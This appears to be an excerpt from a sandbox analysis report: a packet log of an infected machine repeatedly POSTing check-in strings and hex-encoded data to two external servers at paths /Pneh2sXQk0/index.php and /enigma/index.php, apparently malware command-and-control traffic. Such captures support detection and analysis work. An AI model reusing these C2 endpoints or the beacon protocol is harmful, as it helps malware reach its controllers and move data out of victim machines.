                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.285864115 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1537 | 192.168.2.5 | 51393 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.539577961 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.788717985 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1538 | 192.168.2.5 | 51394 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.611449003 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.865340948 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1539 | 192.168.2.5 | 51395 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.111525059 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.358840942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1540 | 192.168.2.5 | 51396 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.113893032 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.354775906 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1541 | 192.168.2.5 | 51397 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.608176947 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.861437082 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1542 | 192.168.2.5 | 51398 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.701699972 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:02.951081991 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1543        192.168.2.5  51399        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.178983927 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.424249887 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1544        192.168.2.5  51400        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.198858976 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.447966099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1545        192.168.2.5  51401        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.683476925 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.939481974 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1546        192.168.2.5  51402        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.785914898 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.029108047 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1547        192.168.2.5  51403        193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.252887011 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.493298054 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port
                                                                                                                                                                                                                                      1548        192.168.2.5  51404        193.233.132.167  80
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.279618025 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:04.528647900 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1549        192.168.2.5  51405        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:04.742151976 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:04.989938021 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1550        192.168.2.5  51406        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:04.863385916 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:05.106466055 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1551        192.168.2.5  51407        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:05.322247982 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:05.569333076 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1552        192.168.2.5  51408        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:05.357223034 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:05.608403921 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1553        192.168.2.5  51409        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:05.819531918 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:06.067626953 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1554        192.168.2.5  51410        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:37:05.947423935 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:06.194155931 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


